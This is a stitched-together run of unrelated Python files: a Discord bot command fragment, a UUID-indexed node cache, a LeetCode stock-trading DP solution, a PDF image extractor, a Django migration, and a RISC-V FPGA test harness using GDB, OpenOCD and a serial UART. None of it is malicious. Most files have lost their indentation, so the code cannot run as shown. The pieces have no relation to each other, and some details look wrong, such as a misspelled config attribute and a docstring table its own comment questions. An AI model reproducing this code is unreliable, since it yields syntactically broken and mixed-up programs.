@decorators.is_home(HOME)
@checks.has_perms(manage_guild=True)
@checks.bot_has_perms(embed_links=True, attach_files=True)
async def _booster(self, ctx, user: converters.DiscordMember = None):
user = user or ctx.author
await self.thank_booster(user)
|
'''
Provides access to any node within EvD by UUID. This is a flattend structure
that is kept coherent with EvDScript's AST.
All nodes can be accessed without a type hint. Additionally, major types can
be more quickly accessed by supplying their hint.
'''
# Cache is global so that we can keep a UUID list for NodeParser
cacheObj = None
def get_evd_cache_obj():
global cacheObj
    if cacheObj is None:
cacheObj = Cache()
return cacheObj
from .data_nodes.trajectory import Trajectory
from .data_nodes.location import Location
from .data_nodes.waypoint import Waypoint
from .data_nodes.thing import Thing
from .data_nodes.trace import Trace
from .data_nodes.machine import Machine
from .data_nodes.thing_type import ThingType
from .data_nodes.regions.region import Region
from .program_nodes.skill import Skill
from .program_nodes.primitive import Primitive
from .environment_nodes.environment_node import EnvironmentNode
from .program import Program
from .context import Context
from .environment import Environment
class Cache(object):
def __init__(self):
self.data = {}
self.instance_table = {
'trajectory': {'class': Trajectory, 'table': {}},
'location': {'class': Location, 'table': {}},
'waypoint': {'class': Waypoint, 'table': {}},
'thing': {'class': Thing, 'table': {}},
'trace': {'class': Trace, 'table': {}},
'machine': {'class': Machine, 'table': {}},
'environment': {'class': Environment, 'table': {}},
'program': {'class': Program, 'table': {}},
'primitive': {'class': Primitive, 'table': {}},
'context': {'class': Context, 'table': {}},
'thing_type': {'class': ThingType, 'table': {}},
'environment_node': {'class': EnvironmentNode, 'table': {}},
'skill': {'class': Skill, 'table': {}},
'region': {'class': Region, 'table': {}}
}
def add(self, uuid, node):
self.data[uuid] = node
for entry in self.instance_table.values():
if isinstance(node,entry['class']):
entry['table'][uuid] = node
def remove(self, uuid):
node = self.data.pop(uuid, None)
for entry in self.instance_table.values():
if isinstance(node,entry['class']):
entry['table'].pop(uuid, None)
def clear(self):
self.data = {}
for entry in self.instance_table.values():
entry['table'] = {}
def get(self, uuid, hint=None):
retVal = None
if hint in self.instance_table.keys() and uuid in self.instance_table[hint]['table'].keys():
retVal = self.instance_table[hint]['table'][uuid]
else:
retVal = self.data[uuid]
return retVal
def set(self, uuid, dct, hint=None):
self.get(uuid,hint).set(dct)
def get_uuids(self, hint=None):
retVal = None
if hint in self.instance_table.keys():
retVal = self.instance_table[hint]['table'].keys()
        elif hint is None:
retVal = self.data.keys()
return retVal
def utility_cache_stats(self):
log = {'data': {}}
for n in self.data.values():
if type(n) not in log['data'].keys():
log['data'][type(n)] = 0
log['data'][type(n)] += 1
for key, entry in self.instance_table.items():
log['num_' + key] = len(entry['table'])
return log
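# Minimal usage sketch (illustrative; `loc` stands for any node instance, e.g. a
# Location, exposing a `uuid` attribute -- its constructor arguments are not shown):
#
#   cache = get_evd_cache_obj()
#   cache.add(loc.uuid, loc)                      # indexed in the flat table and the 'location' table
#   node = cache.get(loc.uuid, hint='location')   # hinted lookup uses the smaller per-type table
#   uuids = cache.get_uuids(hint='location')
#   cache.remove(loc.uuid)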
|
class Solution:
"""
:type k: int
:type prices: List[int]
:rtype: int
@ solution: 因为单纯买并不构成一次交易(要买完再卖)用DP track f(k, B) 和 f(k, S)
记录截至目前完成(刚好K次)交易条件下且当前状态 Buy 或者 没有 Buy 的最大利润
@ example: prices = [3,2,6,5,0,3], 最多(k=2)次交易 ==> return 7 (2买入6卖出,0买入3卖出)
------------------------------------------------------------------------------------------
第i天 f(0,B) f(1,S) f(1,B) f(2,S) f(2,B)
2 (price = 2) -2 0 -2 0 -3
3 (price = 6) -2 4 -2 4 -3
4 (price = 5) -2 4 -1 4 -3
5 (price = 0) 0 4 4 4 -3
5 (price = 3) 0 4 4 7 -3 (我感觉最后这个值是-2?)
"""
def maxProfit(self, k, prices):
if not prices: return 0
n = len(prices)
# If I can buy/sell anywhere I want
if k > n // 2:
res = 0
for i in range(1, len(prices)):
if prices[i] > prices[i - 1]:
res += prices[i] - prices[i - 1]
return res
"""
        f(j, L|H): require long|hold position at the current moment
with no more than j transactions (1 trans: buy and then sell)
- f(j-1, L) = max( f(j-1,L) ; f(j-1,H) - today price)
- f(j, H) = max( f(j, H) ; f(j-1, L) + today price)
"""
n = len(prices)
f = [[0, 0] for _ in range(k + 1)]
for i in range(k + 1):
# this assumes the worst first buy price
f[i][0] = -prices[0]
for i in range(1, n):
for j in range(1, k + 1):
f[j - 1][0] = max(f[j - 1][0], f[j - 1][1] - prices[i])
f[j][1] = max(f[j][1], f[j - 1][0] + prices[i])
return f[k][1]
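if __name__ == '__main__':
    # Quick sanity check (not part of the original solution): with k=2 and
    # prices [3,2,6,5,0,3] the expected answer from the docstring above is 7.
    print(Solution().maxProfit(2, [3, 2, 6, 5, 0, 3]))  # expected: 7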
|
import fitz
from pathlib import Path
imgdir = Path("images")
# Create the image output directory if it does not exist
if not imgdir.is_dir():
imgdir.mkdir(parents=True)
def get_all_images(pdfpath):
    # Collect every image embedded in the PDF
    pdf = fitz.open(pdfpath)
    xreflist = []
    for page_num in range(len(pdf)):
        # List the images referenced on this page
        imgs = pdf.getPageImageList(page_num)
        for img in imgs:
            xref = img[0]
            if xref in xreflist:
                # Already handled this xref, skip it
                continue
            # Recover the pixmap (handles soft masks and other image types)
            pix = recoverpix(pdf, img)
            # Work out the raw image data
            if isinstance(pix, dict):
                # Image file extension
                ext = pix["ext"]
                # Raw image bytes
                imgdata = pix["image"]
                # Number of colour components
                n = pix["colorspace"]
                # Output path for the image
                imgfile = imgdir.joinpath(f"img-{xref}.{ext}")
            else:
                # Output path for the image
                imgfile = imgdir.joinpath(f"img-{xref}.png")
                n = pix.n
                imgdata = pix.getImageData()
            if len(imgdata) <= 2048:
                # Ignore images smaller than 2 KB
                continue
            # Write the image to disk
            print(imgfile)
            with open(imgfile, 'wb') as f:
                f.write(imgdata)
            # Do not process the same xref again
            xreflist.append(xref)
            print(f"{imgfile} save")
def getimage(pix):
    # A colorspace with fewer than 4 components can be saved as-is;
    # otherwise (e.g. CMYK) convert the pixmap to RGB first.
if pix.colorspace.n != 4:
return pix
tpix = fitz.Pixmap(fitz.csRGB, pix)
return tpix
def recoverpix(pdf, item):
    # Recover an image, handling the different image types and any soft mask
    xref = item[0]
    # xref of the image's soft mask (the second entry of the image tuple)
    smask = item[1]
    if smask == 0:
        # No soft mask, extract the embedded image directly
        return pdf.extractImage(xref)
    pix1 = fitz.Pixmap(pdf, xref)
    pix2 = fitz.Pixmap(pdf, smask)
    # Sanity checks before combining image and mask
    if not all([
        # both pixmaps cover the same pixel rectangle
        pix1.irect == pix2.irect,
        # neither pixmap already has an alpha channel
        pix1.alpha == pix2.alpha == 0,
        # the mask pixmap has exactly one component per pixel
        pix2.n == 1
    ]):
        pix2 = None
        return getimage(pix1)
    # Copy pix1 and attach the mask samples as its alpha channel
    pix = fitz.Pixmap(pix1)
    pix.setAlpha(pix2.samples)
    pix1 = pix2 = None
    return getimage(pix)
def main():
pdfpath = Path("3.pdf")
get_all_images(pdfpath)
if __name__ == "__main__":
    main()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-01-08 15:21
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bidding', '0002_auto_20171228_1800'),
]
operations = [
migrations.AlterField(
model_name='bid',
name='approved_date',
field=models.DateTimeField(help_text='The date the bid was approved', null=True),
),
migrations.AlterField(
model_name='bid',
name='closed_date',
field=models.DateTimeField(help_text='The date the bid was closed', null=True),
),
migrations.AlterField(
model_name='bid',
name='create_date',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='bid',
name='declined_date',
field=models.DateTimeField(help_text='The date the bid was declined', null=True),
),
migrations.AlterField(
model_name='bid',
name='draft_date',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='bid',
name='handshake_accepted_date',
field=models.DateTimeField(help_text='The date the handshake was accepted', null=True),
),
migrations.AlterField(
model_name='bid',
name='handshake_declined_date',
field=models.DateTimeField(help_text='The date the handshake was declined', null=True),
),
migrations.AlterField(
model_name='bid',
name='handshake_offered_date',
field=models.DateTimeField(help_text='The date the handshake was offered', null=True),
),
migrations.AlterField(
model_name='bid',
name='in_panel_date',
field=models.DateTimeField(help_text='The date the bid was scheduled for panel', null=True),
),
migrations.AlterField(
model_name='bid',
name='scheduled_panel_date',
field=models.DateTimeField(help_text='The date of the paneling meeting', null=True),
),
migrations.AlterField(
model_name='bid',
name='submitted_date',
field=models.DateTimeField(help_text='The date the bid was submitted', null=True),
),
migrations.AlterField(
model_name='bid',
name='update_date',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='bidcycle',
name='cycle_deadline_date',
field=models.DateTimeField(help_text='The deadline date for the bid cycle'),
),
migrations.AlterField(
model_name='bidcycle',
name='cycle_end_date',
field=models.DateTimeField(help_text='The end date for the bid cycle'),
),
migrations.AlterField(
model_name='bidcycle',
name='cycle_start_date',
field=models.DateTimeField(help_text='The start date for the bid cycle'),
),
migrations.AlterField(
model_name='waiver',
name='create_date',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='waiver',
name='update_date',
field=models.DateTimeField(auto_now=True),
),
]
|
#! /usr/bin/env python3
import re
from subprocess import run, TimeoutExpired, PIPE
import tempfile
import time
import os
from pexpect import spawn, which, TIMEOUT, EOF
from pexpect.replwrap import REPLWrapper
import serial
import serial.tools.list_ports
import argparse
import logging
import gfeconfig
class GdbError(Exception):
pass
class GdbSession(object):
'''Wraps a pseudo-terminal interface to GDB on the FPGA via OpenOCD.'''
def __init__(self, gdb='riscv64-unknown-elf-gdb', openocd='openocd',
openocd_config_filename='./testing/targets/ssith_gfe.cfg', timeout=60):
print_and_log("Starting GDB session...")
if not which(gdb):
raise GdbError('Executable {} not found'.format(gdb))
if not which(openocd):
raise GdbError('Executable {} not found'.format(openocd))
xlen=32 # Default
try:
run_and_log(print_and_log("Starting openocd"), run([openocd, '-f', openocd_config_filename], \
timeout=0.5, stdout=PIPE, stderr=PIPE))
except TimeoutExpired as exc:
log = str(exc.stderr, encoding='utf-8')
match = re.search('XLEN=(32|64)', log)
if match:
xlen = int(match.group(1))
else:
raise GdbError('XLEN not found by OpenOCD')
# Create temporary files for gdb and openocd. The `NamedTemporaryFile`
# objects are stored in `self` so the files stay around as long as this
# `GdbSession` is in use. We open both in text mode, instead of the
# default 'w+b'.
self.openocd_log = tempfile.NamedTemporaryFile(mode='w', prefix='openocd.', suffix='.log')
self.gdb_log = tempfile.NamedTemporaryFile(mode='w', prefix='gdb.', suffix='.log')
init_cmds = '\n'.join([
'set confirm off',
            'set pagination off',
            'set width 0',
'set height 0',
'set print entry-values no',
'set remotetimeout {}'.format(timeout),
'set arch riscv:rv{}'.format(xlen),
'target remote | {} -c "gdb_port pipe; log_output {}" -f {}'.format(
openocd, self.openocd_log.name, openocd_config_filename)
])
self.pty = spawn(gdb, encoding='utf-8', logfile=self.gdb_log, timeout=timeout)
self.repl = REPLWrapper(self.pty, '(gdb) ', None, extra_init_cmd=init_cmds)
def __del__(self):
print_and_log("Closing GDB session...")
self.pty.close()
def cmd(self, gdb_command_string, timeout=-1):
if not self.pty.isalive():
raise GdbError('Dead process')
try:
reply = self.repl.run_command(gdb_command_string, timeout=timeout)
except TIMEOUT as exc:
self.pty.close()
raise GdbError('Timeout expired') from exc
except EOF as exc:
self.pty.close()
raise GdbError('Read end of file') from exc
return reply
def cont(self):
if not self.pty.isalive():
raise GdbError('Dead process')
self.pty.send("continue\n")
def interrupt(self):
# send ctrl-c and wait for prompt
return self.cmd('\003')
def c(self, timeout):
try:
self.cmd('c', timeout=timeout)
except GdbError:
self.interrupt()
def x(self, address, size='w'):
output = self.cmd("x/{} {:#x}".format(size, address))
print_and_log('Read raw output: {}'.format(output))
if ':' in output:
value = int(output.split(':')[1], base=0)
else:
raise GdbError('Failed to read from address {:#x}'.format(address))
return value
def read32(self, address, debug_text=None):
value = self.x(address=address, size="1w")
if debug_text is not None:
print_and_log("{} Read: {:#x} from {:#x}".format(
debug_text, value, address))
return value
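# Illustrative GdbSession usage, kept as a comment so nothing runs at import time.
# The config path is the constructor default; the address and label are made up.
#
#   gdb = GdbSession(openocd_config_filename='./testing/targets/ssith_gfe.cfg')
#   gdb.cmd('monitor reset halt')
#   value = gdb.read32(0x70000000, debug_text='example read')
#   del gdb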
class UartError(Exception):
pass
class UartSession(object):
'''Wraps a serial interface to the UART on the FPGA.'''
def __init__(self, port=None,
search_vid=0x10C4, search_pid=0xEA70, timeout=1,
baud=115200, parity="NONE", stopbits=2, bytesize=8):
print_and_log("Starting UART session...")
if port in (None, 'auto'):
# Get a list of all serial ports with the desired VID/PID
ports = [p for p in serial.tools.list_ports.comports()
if p.vid == search_vid and p.pid == search_pid]
# Silabs chip on VCU118 has two ports;
# locate port 1 from the hardware description
for p in ports:
if re.search('LOCATION=.*:1.1', p.hwid):
print_and_log("Located UART device at {} with serial number {}".format(
p.device, p.serial_number))
port = p.device
if port in (None, 'auto'):
raise UartError("Could not find a UART port with VID={:X}, PID={:X}".format(
search_vid, search_pid))
# Validate inputs and translate into serial settings
def select(choice, options):
valid_choice = options.get(choice)
if valid_choice is None:
raise ValueError('Invalid argument {}; use one of {}'.format(
choice, list(options.keys())))
return valid_choice
valid_parity = select(parity.lower(), {
"odd": serial.PARITY_ODD,
"even": serial.PARITY_EVEN,
"none": serial.PARITY_NONE,
})
valid_stopbits = select(stopbits, {
1: serial.STOPBITS_ONE,
2: serial.STOPBITS_TWO,
})
valid_bytesize = select(bytesize, {
5: serial.FIVEBITS,
6: serial.SIXBITS,
7: serial.SEVENBITS,
8: serial.EIGHTBITS,
})
# Configure the serial connections
self.uart = serial.Serial(
timeout=timeout,
port=port,
baudrate=baud,
parity=valid_parity,
stopbits=valid_stopbits,
bytesize=valid_bytesize,
)
if not self.uart.is_open:
self.uart.open()
def __del__(self):
print_and_log("Closing UART session...")
def send(self, data):
if isinstance(data, str):
data = data.encode('utf-8')
try:
num_bytes_written = self.uart.write(data)
except serial.SerialException as exc:
raise UartError('Timed out before write finished') from exc
return num_bytes_written
def read(self, timeout, decode=True):
# Local timeout (in seconds) should be less than global timeout
# passed to the Serial constructor, if any.
rx = b''
start_time = time.time()
pending = None
while time.time() < start_time + timeout:
pending = self.uart.in_waiting
if pending:
rx += self.uart.read(pending)
if pending:
raise UartError('Read timed out with {} bytes still pending'.format(
pending))
if decode:
rx = str(rx, encoding='utf-8')
return rx
def read_and_check(self, timeout, expected_contents, absent_contents=[], decode=True):
# Local timeout (in seconds) should be less than global timeout
# passed to the Serial constructor, if any.
rx = b''
start_time = time.time()
pending = None
contains_expected_contents = False
contains_absent_contents = False
while time.time() < start_time + timeout:
pending = self.uart.in_waiting
if pending:
new_data = self.uart.read(pending)
rx += new_data
res = [ (bytes(text, encoding='utf-8') in rx) for text in expected_contents]
res_absent = [ (bytes(text, encoding='utf-8') in rx) for text in absent_contents]
if all(res):
contains_expected_contents = True
print_and_log("Found all expected contents.")
if any(res_absent):
contains_absent_contents = True
print_and_log("Found at least some absent contents.")
if contains_expected_contents or contains_absent_contents:
print_and_log("Early exit!")
break
if decode:
rx = str(rx, encoding='utf-8')
print_and_log(rx)
if contains_expected_contents:
if contains_absent_contents:
print_and_log(rx)
print_and_log("Absent contents present!")
return False, rx
else:
print_and_log("All expected contents found")
return True, rx
else:
print_and_log("Expected contents NOT found!")
return False, rx
# ISA test code
def isa_tester(gdb, isa_exe_filename):
print_and_log('Starting ISA test of ' + isa_exe_filename)
soft_reset_cmd = 'set *((int *) 0x6FFF0000) = 1'
if '-p-' in isa_exe_filename:
breakpoint = 'write_tohost'
tohost_var = '$gp'
elif '-v-' in isa_exe_filename:
breakpoint = 'terminate'
tohost_var = '$a0'
else:
raise ValueError('Malformed ISA test filename')
setup_cmds = [
'dont-repeat',
soft_reset_cmd,
'monitor reset halt',
'delete',
'file ' + isa_exe_filename,
'load',
'break ' + breakpoint,
'continue'
]
print_and_log('Loading and running {} ...'.format(isa_exe_filename))
for c in setup_cmds:
gdb.cmd(c)
raw_tohost = gdb.cmd(r'printf "%x\n", ' + tohost_var)
tohost = int(raw_tohost.split('\r', 1)[0], 16)
if tohost == 1:
print_and_log('PASS')
return True
else:
# check s-break instruction test
if "sbreak" in isa_exe_filename and "do_break" in gdb.cmd("frame"):
print_and_log('PASS')
return True
else:
print_and_log('FAIL (tohost={:#x})'.format(tohost))
return False
# Compile FreeRTOS program
def freertos_compile_program(config, prog_name):
run_and_log(print_and_log("Cleaning FreeRTOS program directory"),
run(['make','clean'],cwd=config.freertos_folder,
env=dict(os.environ, USE_CLANG=config.use_clang, PROG=prog_name, XLEN=config.xlen,
configCPU_CLOCK_HZ=config.cpu_freq), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Compiling: " + prog_name),
run(['make'],cwd=config.freertos_folder,
env=dict(os.environ, SYSROOT_DIR= config.freertos_sysroot_path + '/riscv' + config.xlen + '-unknown-elf/', USE_CLANG=config.use_clang,
PROG=prog_name, XLEN=config.xlen, configCPU_CLOCK_HZ=config.cpu_freq), stdout=PIPE, stderr=PIPE))
filename = config.freertos_folder + '/' + prog_name + '.elf'
return filename
# Common FreeRTOS test code
def test_freertos_common(gdb, uart, config, prog_name):
print_and_log("\nTesting: " + prog_name)
filename = freertos_compile_program(config, prog_name)
res, rx = basic_tester(gdb, uart, filename,
timeout=config.freertos_timeouts[prog_name],
expected_contents=config.freertos_expected_contents[prog_name],
absent_contents=config.freertos_absent_contents[prog_name])
return res, rx
# Simple wrapper to test non-networking FreeRTOS programs
def test_freertos_single_test(uart, config, prog_name):
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
res, _rx = test_freertos_common(gdb, uart, config, prog_name)
del gdb
return res
# Similar to `test_freertos` except after checking for expected contents it pings
# the FPGA
def test_freertos_network(uart, config, prog_name):
import socket
import select
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
res, rx = test_freertos_common(gdb, uart, config, prog_name)
# early exit
if not res:
del gdb
return False
# Get FPGA IP address
riscv_ip = 0
rx_list = rx.split('\n')
for line in rx_list:
index = line.find('IP Address:')
if index != -1:
ip_str = line.split()
riscv_ip = ip_str[2]
# Ping FPGA
print("RISCV IP address is: " + riscv_ip)
if (riscv_ip == 0) or (riscv_ip == "0.0.0.0"):
raise Exception("Could not get RISCV IP Address. Check that it was assigned in the UART output.")
print_and_log("Ping FPGA")
ping_result = run(['ping','-c','10',riscv_ip], stdout=PIPE, stderr=PIPE)
print_and_log(str(ping_result.stdout,'utf-8'))
if ping_result.returncode != 0:
print_and_log("Ping FPGA failed")
del gdb
return False
else:
print_and_log("Ping OK")
if prog_name == "main_udp":
# Send UDP packet
print_and_log("\n Sending to RISC-V's UDP echo server")
# Create a UDP socket at client side
UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
msgFromClient = "Hello UDP Server"
bytesToSend = msgFromClient.encode('utf-8')
serverAddressPort = (riscv_ip, 5006)
bufferSize = 1024
# Send to server using created UDP socket
UDPClientSocket.setblocking(0)
UDPClientSocket.sendto(bytesToSend, serverAddressPort)
ready = select.select([UDPClientSocket], [], [], 10)
if ready[0]:
msgFromServer = str((UDPClientSocket.recvfrom(bufferSize))[0],'utf-8')
if msgFromClient != msgFromServer:
print_and_log(prog_name + ": " + msgFromClient + " is not equal to " + msgFromServer)
res = False
else:
print_and_log("UDP message received")
else:
print_and_log("UDP server timeout")
res = False
elif prog_name == "main_tcp":
# Run TCP echo client
print_and_log("\n Sending to RISC-V's TCP echo server")
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = (riscv_ip, 7)
print_and_log('connecting to %s port %s' % server_address)
sock.connect(server_address)
sock.setblocking(0)
try:
# Send data
message = 'This is the message. It will be repeated.'
print_and_log('sending "%s"' % message)
sock.sendall(message.encode('utf-8'))
# Look for the response
amount_received = 0
amount_expected = len(message)
while amount_received < amount_expected:
ready = select.select([sock], [], [], 10)
if ready[0]:
data = str(sock.recv(128),'utf-8')
amount_received += len(data)
print_and_log('received "%s"' % data)
if message != data:
print_and_log(prog_name + ": " + message + " is not equal to " + data)
res = False
else:
print_and_log("TCP socket timeout")
res = False
break
finally:
print_and_log('closing socket')
sock.close()
else:
print_and_log("Unknown FreeRTOS network test, doing nothing after pinging")
del gdb
return res
# Netboot loader
# Similar to network test
def load_netboot(config, path_to_elf, timeout, interactive, expected_contents=[], absent_contents=[]):
print_and_log("Loading netboot")
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
uart = UartSession()
res, rx = test_freertos_common(gdb, uart, config, 'main_netboot')
# early exit
if not res:
raise RuntimeError("Loading netboot failed - check log for more details.")
run_and_log(print_and_log("Moving elf to netboot server folder"),
run(['cp',path_to_elf,config.netboot_folder], stdout=PIPE, stderr=PIPE))
elf_name = os.path.basename(path_to_elf)
print_and_log("Netboot loaded OK, loading binary file: " + elf_name + " from " + config.netboot_folder)
cmd = "boot " + config.netboor_server_ip + " " + elf_name + "\r"
uart.send(cmd.encode())
rx = uart.read(10)
print_and_log(rx)
if interactive:
while True:
# TODO: this waits indefinitely for input, which is not great
# Attempt to improve with https://stackoverflow.com/a/10079805
cmd = input()
uart.send(cmd.encode() + b'\r')
rx = uart.read(1)
print(rx)
else:
res, rx = uart.read_and_check(timeout, expected_contents, absent_contents)
del gdb
del uart
if not res:
raise RuntimeError("Load netboot failed - check log for more details.")
# Wrapper for loading a binary
def load_elf(config, path_to_elf, timeout, interactive, expected_contents=[], absent_contents=[]):
print_and_log("Load and run binary: " + path_to_elf)
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
uart = UartSession()
    res, _rx = basic_tester(gdb, uart, path_to_elf, timeout, expected_contents, absent_contents, interactive)
del uart
del gdb
if not res:
raise RuntimeError("Load elf failed - check log for more details.")
# Generic basic tester
def basic_tester(gdb, uart, exe_filename, timeout, expected_contents=[], absent_contents=[], interactive=False):
print_and_log('Starting basic tester using ' + exe_filename)
soft_reset_cmd = 'set *((int *) 0x6FFF0000) = 1'
gdb.interrupt()
setup_cmds = [
'dont-repeat',
soft_reset_cmd,
soft_reset_cmd, # reset twice to make sure we did reset
'monitor reset halt',
'delete',
'file ' + exe_filename,
'set $a0 = 0',
'set $a1 = 0x70000020',
'load',
]
print_and_log('Loading and running {} ...'.format(exe_filename))
for c in setup_cmds:
gdb.cmd(c)
print_and_log("Continuing")
gdb.cont()
if interactive:
while True:
# TODO: this waits indefinitely for input, which is not great
# Attempt to improve with https://stackoverflow.com/a/10079805
cmd = input()
uart.send(cmd.encode() + b'\r')
rx = uart.read(1)
print(rx)
else:
res, rx = uart.read_and_check(timeout, expected_contents, absent_contents)
if res:
print_and_log('PASS')
return True, rx
else:
print_and_log('FAIL')
return False, rx
# Simple wrapper that prints as well as logs the message
def print_and_log(msg):
print(msg)
logging.debug(msg)
return 1
# Run command
# Raise a runtime exception if it fails
def run_and_log(cmd, res, expected_contents=None):
res_stdout = str(res.stdout,'utf-8')
logging.debug(res_stdout)
if expected_contents:
if expected_contents in res_stdout:
res.returncode = 0
else:
res.returncode = 1
if res.returncode != 0:
logging.debug(str(res.stderr,'utf-8'))
msg = str("Running command failed. Check test_processor.log for more details.")
raise RuntimeError(msg)
return res_stdout
# Run simulator tests and exit
def test_simulator(config):
print_and_log("Run Verilator tests")
run_and_log(print_and_log("Compiling ISA tests"),
run(['make'], cwd="./riscv-tests/isa", stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Building Verilator simulator for " + config.proc_name),
run(['make','simulator'],cwd="./verilator_simulators",
env=dict(os.environ, PROC=config.proc_name), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Testing " + config.proc_name),
run(['make','isa_tests'],cwd="./verilator_simulators/run",
env=dict(os.environ, PROC=config.proc_name), stdout=PIPE, stderr=PIPE))
print_and_log("Verilator tests OK, exiting...")
exit(0)
# Program bitstream
def test_program_bitstream(config):
# For BSV CPUs, always program flash with nop binary
if 'bluespec' in config.proc_name:
run_and_log(print_and_log("Programming flash"),
run(['tcl/program_flash','datafile','./bootmem/small.bin'], stdout=PIPE, stderr=PIPE),
"Program/Verify Operation successful.")
run_and_log(print_and_log("Programming bitstream"),
run(['./pyprogram_fpga.py', config.proc_name], stdout=PIPE, stderr=PIPE))
# ISA tests
def test_isa(config):
print_and_log("Run ISA tests")
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
run_and_log(print_and_log("Compiling ISA tests"),
run(['./configure','--target=riscv64-unknown-elf',
'--with-xlen=' + config.xlen],cwd="./riscv-tests",
env=dict(os.environ, CC="riscv64-unknown-elf-gcc"), stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log(""), run(['make'], cwd="./riscv-tests", stdout=PIPE, stderr=PIPE))
res = run_and_log(print_and_log("Generating a list of available ISA tests"),
run(['./testing/scripts/gen-test-all',config.xarch], stdout=PIPE, stderr=PIPE))
files = res.split("\n")
isa_failed = []
for filename in files:
if filename:
if not isa_tester(gdb, filename):
isa_failed.append(filename)
del gdb
if isa_failed:
raise RuntimeError("ISA tests failed: " + str(isa_failed))
print_and_log("ISA test passed")
# FreeRTOS tests
def test_freertos(config, args):
print_and_log("Run FreeRTOS tests")
uart = UartSession()
freertos_failed = []
if not args.io and not args.network and not args.flash:
for prog in config.freertos_basic_tests:
if not test_freertos_single_test(uart, config, prog):
freertos_failed.append(prog)
if args.io:
print_and_log("IO tests")
for prog in config.freertos_io_tests:
if not test_freertos_single_test(uart, config, prog):
freertos_failed.append(prog)
if args.network:
print_and_log("Network tests")
for prog in config.freertos_network_tests:
if config.xlen=='64' and prog == "main_tcp":
print_and_log("TCP test not a part of 64-bit FreeRTOS, skipping")
continue
if not test_freertos_network(uart, config, prog):
freertos_failed.append(prog)
print_and_log(prog + " FAILED")
else:
print_and_log(prog + " PASSED")
print_and_log("sleeping for 10 seconds between network tests")
time.sleep(10)
if args.flash:
prog_name = config.flash_prog_name
print_and_log("Flash test with " + prog_name)
print_and_log("Compile FreeRTOS binary")
filename = freertos_compile_program(config, prog_name)
run_and_log(print_and_log("Clean bootmem"), run(['make','-f','Makefile.flash','clean'],cwd=config.bootmem_folder,
env=dict(os.environ, USE_CLANG=config.use_clang, PROG=prog_name, XLEN=config.xlen),
stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Copy FreeRTOS binary"),
run(['cp',filename,config.bootmem_folder], stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Make bootable binary"),
run(['make','-f','Makefile.flash'],cwd=config.bootmem_folder,
env=dict(os.environ, USE_CLANG=config.use_clang, PROG=prog_name+'.elf', XLEN=config.xlen),
stdout=PIPE, stderr=PIPE))
run_and_log(print_and_log("Programming persistent memory with binary"),
run(['tcl/program_flash','datafile', config.bootmem_path], stdout=PIPE, stderr=PIPE),
"Program/Verify Operation successful.")
run_and_log(print_and_log("Programming bitstream"),
run(['./pyprogram_fpga.py', config.proc_name], stdout=PIPE, stderr=PIPE))
print_and_log("Check contents")
if uart.read_and_check(timeout=config.freertos_timeouts[prog_name],
expected_contents=config.freertos_expected_contents[prog_name],
absent_contents=config.freertos_absent_contents[prog_name])[0]:
print_and_log('Flash test PASS')
else:
print_and_log('Flash test FAIL')
freertos_failed.append('flash_' + prog_name)
del uart
if freertos_failed:
raise RuntimeError("FreeRTOS IO tests failed: " + str(freertos_failed))
print_and_log("FreeRTOS tests passed")
# FreeBSD tests
def test_freebsd(config, args):
print_and_log("Running FreeBSD tests")
build_freebsd(config)
uart = UartSession()
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
print_and_log("FreeBSD basic test")
res, _val = basic_tester(gdb, uart, config.freebsd_filename_bbl, \
config.freebsd_timeouts['boot'], config.freebsd_expected_contents['boot'], \
config.freebsd_absent_contents['boot'])
if res == True:
print_and_log("FreeBSD basic test passed")
else:
raise RuntimeError("FreeBSD basic test failed")
print_and_log("FreeBSD network test [WIP!]")
# # Copied from BuzyBox net test
# # Get the name of ethernet interface
# cmd = b'ip a | grep "eth.:" -o \r'
# print_and_log(cmd)
# uart.send(cmd)
# rx = uart.read(3)
# print_and_log(rx)
# if "eth1" in rx:
# cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth1\r'
# cmd2 = b'ip link set eth1 up\r'
# else:
# cmd1 = b'ip addr add 10.88.88.2/24 broadcast 10.88.88.255 dev eth0\r'
# cmd2 = b'ip link set eth0 up\r'
# print_and_log(cmd1)
# uart.send(cmd1)
# print_and_log(cmd2)
# uart.send(cmd2)
# cmd3 = b'ip a\r'
# print_and_log(cmd3)
# uart.send(cmd3)
# if not uart.read_and_check(120, config.busybox_expected_contents['ping'])[0]:
# raise RuntimeError("Busybox network test failed: cannot bring up eth interface")
# print_and_log("Ping FPGA")
# riscv_ip = "10.88.88.2"
# ping_result = run(['ping','-c','10',riscv_ip], stdout=PIPE, stderr=PIPE)
# print_and_log(str(ping_result.stdout,'utf-8'))
# if ping_result.returncode != 0:
# raise RuntimeError("Busybox network test failed: cannot ping the FPGA")
# else:
# print_and_log("Ping OK")
del uart
del gdb
# Busybox tests
def test_busybox(config, args):
print_and_log("Running busybox tests")
if config.compiler == "clang":
raise RuntimeError("Clang compiler is not supported for building Busybox tests yet")
pwd = run(['pwd'], stdout=PIPE, stderr=PIPE)
pwd = str(pwd.stdout,'utf-8').rstrip()
if args.no_pcie:
linux_config_path = pwd + '/' + config.busybox_linux_config_path_no_pcie
else:
linux_config_path = pwd + '/' + config.busybox_linux_config_path
build_busybox(config, linux_config_path)
uart = UartSession()
print_and_log("Busybox basic test")
gdb = GdbSession(openocd_config_filename=config.openocd_config_filename)
